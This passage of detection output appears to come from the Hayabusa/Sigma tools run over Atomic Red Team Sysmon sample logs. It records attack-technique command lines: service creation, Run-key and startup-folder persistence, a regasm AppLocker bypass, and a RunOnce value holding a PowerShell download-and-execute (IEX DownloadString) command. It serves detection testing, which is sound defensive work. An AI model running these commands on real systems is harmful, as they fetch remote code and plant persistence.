DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | 
Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 
747F3D96-D739-5D31-0000-00104CB72600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | 
PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN 
Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 
+09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN 
Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 
747F3D96-D772-5D31-0000-001083ED2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | 
PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 
0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | 
PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 